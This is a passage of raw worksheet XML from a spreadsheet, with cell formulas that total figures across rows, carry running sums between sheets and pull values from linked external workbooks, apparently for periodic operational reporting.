        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'26'!K75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G76+'26'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'26'!K76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G77+'26'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'26'!K77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G78+'26'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'26'!K78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'[16]27'!$E$7</f>
        <v>630.22</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'26'!H79</f>
        <v>14599.1</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>161727.57</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]27'!$I$7</f>
        <v>427.5</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'26'!K79</f>
        <v>13239</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>155130.45</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]27'!$L$7</f>
        <v>6244.88</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>12.48976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'[16]27'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'26'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]27'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'26'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]27'!$Y$15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G81+'26'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'26'!K81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G82+'26'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'26'!K82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G83+'26'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'26'!K83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G84+'26'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'26'!K84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G85+'26'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'26'!K85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pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E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28/31</f>
        <v>0.903225806451613</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46019</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22446.66</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'27'!H5</f>
        <v>590053.57</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6744919.6</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>24002.297</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'27'!K5</f>
        <v>646848.404</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6796919.535</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>210672.99</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>56.3296764705882</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]28'!$W$101</f>
        <v>0</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]28'!$X$101</f>
        <v>271.294167565063</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]28'!$Y$101</f>
        <v>260.421411059556</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]28'!$T$101</f>
        <v>0</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]28'!$U$101</f>
        <v>34.3700892857143</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]28'!$V$101</f>
        <v>62.3191298342541</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]28'!$Q$101</f>
        <v>0</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]28'!$R$101</f>
        <v>230.967</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]28'!$S$101</f>
        <v>5414.286</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]28'!$D$23+'[11]28'!$D$17+'[12]28'!$D$17+'[13]28'!$D$25+'[14]28'!$D$8+'[14]28'!$D$15+'[15]28'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]28'!$E$23+'[11]28'!$E$17+'[12]28'!$E$17+'[13]28'!$E$25+'[14]28'!$E$8+'[14]28'!$E$15+'[15]28'!$E$7</f>
        <v>155</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'27'!H6</f>
        <v>7805</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>284154.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]28'!$I$23+'[11]28'!$I$17+'[12]28'!$I$17+'[13]28'!$I$25+'[14]28'!$E$23+'[14]28'!$E$30+'[15]28'!$H$7</f>
        <v>568.76</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'27'!K6</f>
        <v>20812.08</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>283009.78</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]28'!$L$23+'[11]28'!$L$17+'[12]28'!$L$17+'[13]28'!$L$25+'[14]28'!$H$23+'[14]28'!$H$30+'[15]28'!$K$7</f>
        <v>19105.76</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]28'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]28'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]28'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]28'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]28'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]28'!$V$102</f>
        <v>32.7486072744015</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]28'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]28'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]28'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]28'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]28'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'27'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]28'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'27'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]28'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]28'!$W$107</f>
        <v>119.7</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]28'!$X$107</f>
        <v>126.351816305096</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]28'!$Y$107</f>
        <v>131.37343656076</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]28'!$T$107</f>
        <v>41.6666666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]28'!$U$107</f>
        <v>41.0877976190476</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]28'!$V$107</f>
        <v>31.7856813996316</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]28'!$Q$107</f>
        <v>10</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]28'!$R$107</f>
        <v>276.11</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]28'!$S$107</f>
        <v>2761.53999999999</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]28'!$D$27+'[11]28'!$D$18+'[13]28'!$D$26+'[14]28'!$D$10+'[14]28'!$D$17+'[15]28'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]28'!$E$27+'[11]28'!$E$18+'[13]28'!$E$26+'[14]28'!$E$10+'[14]28'!$E$17+'[15]28'!$E$9</f>
        <v>4616</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'27'!H8</f>
        <v>62258</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>587794.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]28'!$I$27+'[11]28'!$I$18+'[13]28'!$I$26+'[14]28'!$E$25+'[14]28'!$E$32+'[15]28'!$H$9</f>
        <v>2742.4</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'27'!K8</f>
        <v>71416.16</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>579160.87</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]28'!$L$27+'[11]28'!$L$18+'[13]28'!$L$26+'[14]28'!$H$25+'[14]28'!$H$32+'[15]28'!$K$9</f>
        <v>32721.74</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]28'!$W$108</f>
        <v>130.586080586081</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]28'!$X$108</f>
        <v>132.931685547545</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]28'!$Y$108</f>
        <v>128.069047284127</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]28'!$T$108</f>
        <v>45.5</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]28'!$U$108</f>
        <v>43.3482142857143</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]28'!$V$108</f>
        <v>28.6389272559852</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]28'!$Q$108</f>
        <v>10.92</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]28'!$R$108</f>
        <v>291.3</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]28'!$S$108</f>
        <v>2488.15</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]28'!$D$24+'[11]28'!$D$19+'[12]28'!$D$20+'[13]28'!$D$27+'[14]28'!$D$11+'[14]28'!$D$18+'[15]28'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]28'!$E$24+'[11]28'!$E$19+'[12]28'!$E$20+'[13]28'!$E$27+'[14]28'!$E$11+'[14]28'!$E$18+'[15]28'!$E$10</f>
        <v>14422</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'27'!H9</f>
        <v>421324</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4556712.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]28'!$I$24+'[11]28'!$I$19+'[12]28'!$I$20+'[13]28'!$I$27+'[14]28'!$E$26+'[14]28'!$E$33+'[15]28'!$H$10</f>
        <v>16571.027</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'27'!K9</f>
        <v>437531.064</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4535009.875</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]28'!$L$24+'[11]28'!$L$19+'[12]28'!$L$20+'[13]28'!$L$27+'[14]28'!$H$26+'[14]28'!$H$33+'[15]28'!$K$10</f>
        <v>94658.648</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]28'!$W$109</f>
        <v>235.98971722365</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]28'!$X$109</f>
        <v>264.439411098528</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]28'!$Y$109</f>
        <v>270.754527857291</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]28'!$T$109</f>
        <v>48.625</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]28'!$U$109</f>
        <v>36.7916666666667</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]28'!$V$109</f>
        <v>35.0233655616942</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]28'!$Q$109</f>
        <v>11.67</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]28'!$R$109</f>
        <v>247.24</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]28'!$S$109</f>
        <v>3042.82999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]28'!$D$25+'[11]28'!$D$20+'[12]28'!$D$21+'[13]28'!$D$28+'[14]28'!$D$12+'[14]28'!$D$19+'[15]28'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]28'!$E$25+'[11]28'!$E$20+'[12]28'!$E$21+'[13]28'!$E$28+'[14]28'!$E$12+'[14]28'!$E$19+'[15]28'!$E$11</f>
        <v>0</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'27'!H10</f>
        <v>62276</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>979803.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]28'!$I$25+'[11]28'!$I$20+'[12]28'!$I$21+'[13]28'!$I$28+'[14]28'!$E$27+'[14]28'!$E$34+'[15]28'!$H$11</f>
        <v>3012.24</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'27'!K10</f>
        <v>79888.34</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>977117.06</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]28'!$L$25+'[11]28'!$L$20+'[12]28'!$L$21+'[13]28'!$L$28+'[14]28'!$H$27+'[14]28'!$H$34+'[15]28'!$K$11</f>
        <v>43594.602</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]28'!$W$110</f>
        <v>192.349726775956</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]28'!$X$110</f>
        <v>249.441766571911</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]28'!$Y$110</f>
        <v>267.284047106715</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]28'!$T$110</f>
        <v>7.625</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]28'!$U$110</f>
        <v>36.1205357142857</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]28'!$V$110</f>
        <v>34.6085405156537</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]28'!$Q$110</f>
        <v>1.83</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]28'!$R$110</f>
        <v>242.73</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]28'!$S$110</f>
        <v>3006.79</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]28'!$D$26+'[11]28'!$D$21+'[12]28'!$D$19+'[13]28'!$D$29+'[14]28'!$D$13+'[14]28'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]28'!$E$26+'[11]28'!$E$21+'[12]28'!$E$19+'[13]28'!$E$29+'[14]28'!$E$13+'[14]28'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'27'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]28'!$I$26+'[11]28'!$I$21+'[12]28'!$I$19+'[13]28'!$I$29+'[14]28'!$E$28+'[14]28'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'27'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]28'!$L$26+'[11]28'!$L$21+'[12]28'!$L$19+'[13]28'!$L$29+'[14]28'!$H$28+'[14]28'!$H$35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5863.57000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'27'!H12</f>
        <v>208307.690000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5150698.94</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>18334.42</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'27'!K12</f>
        <v>469284.183</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5498390.559</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>165797.752000051</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>37.7671416856608</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]28'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]28'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]28'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]28'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]28'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]28'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]28'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]28'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]28'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'27'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'27'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>30.4216058715689</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]28'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]28'!$X$68</f>
        <v>263.636596158273</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]28'!$Y$68</f>
        <v>266.206969721701</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]28'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]28'!$U$68</f>
        <v>58.1800595238095</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]28'!$V$68</f>
        <v>70.5168047882136</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]28'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]28'!$R$68</f>
        <v>390.97</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]28'!$S$68</f>
        <v>6126.50</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>2881</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'27'!H14</f>
        <v>75911</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>1040454.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>6361.42</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'27'!K14</f>
        <v>153856.025</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1946800.131</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>52110.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]28'!$W$71</f>
        <v>247.130434782609</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]28'!$X$71</f>
        <v>221.528505392912</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]28'!$Y$71</f>
        <v>214.099230062055</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]28'!$T$71</f>
        <v>47.9166666666667</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]28'!$U$71</f>
        <v>48.2886904761905</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]28'!$V$71</f>
        <v>50.0805709023941</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]28'!$Q$71</f>
        <v>11.50</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]28'!$R$71</f>
        <v>324.50</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]28'!$S$71</f>
        <v>4351.00</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'27'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'27'!K15</f>
        <v>8875.168</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>123631.668</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]28'!$W$72</f>
        <v>60.0193610842207</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]28'!$X$72</f>
        <v>62.9633740288568</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]28'!$Y$72</f>
        <v>61.4516485948219</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]28'!$T$72</f>
        <v>43.0416666666667</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]28'!$U$72</f>
        <v>67.0386904761905</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]28'!$V$72</f>
        <v>52.0142725598527</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]28'!$Q$72</f>
        <v>10.33</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]28'!$R$72</f>
        <v>450.50</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]28'!$S$72</f>
        <v>4519.00</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'27'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'27'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]28'!$W$73</f>
        <v>61.568247821878</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]28'!$X$73</f>
        <v>60.8577680525164</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]28'!$Y$73</f>
        <v>62.7144751376466</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]28'!$T$73</f>
        <v>43.0416666666667</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]28'!$U$73</f>
        <v>68.0059523809524</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]28'!$V$73</f>
        <v>53.5591620626151</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]28'!$Q$73</f>
        <v>10.33</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]28'!$R$73</f>
        <v>457.00</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]28'!$S$73</f>
        <v>4653.22</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
